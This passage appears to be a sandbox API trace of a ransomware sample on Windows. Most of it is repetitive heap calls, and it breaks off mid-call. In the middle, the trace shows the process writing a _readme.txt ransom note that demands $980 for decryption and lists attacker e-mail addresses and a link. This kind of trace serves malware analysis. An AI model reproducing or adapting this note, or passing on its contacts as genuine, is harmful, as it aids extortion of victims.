[0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.322] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0056.322] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.322] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.322] PathFindFileNameW (pszPath="") returned="" [0056.322] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.323] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.323] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.323] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.323] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0056.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.323] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0056.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.323] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.323] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.323] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.324] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.324] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.325] CloseHandle (hObject=0x5c8) returned 1 [0056.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.325] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.325] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.325] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.325] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.325] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.325] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.326] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, 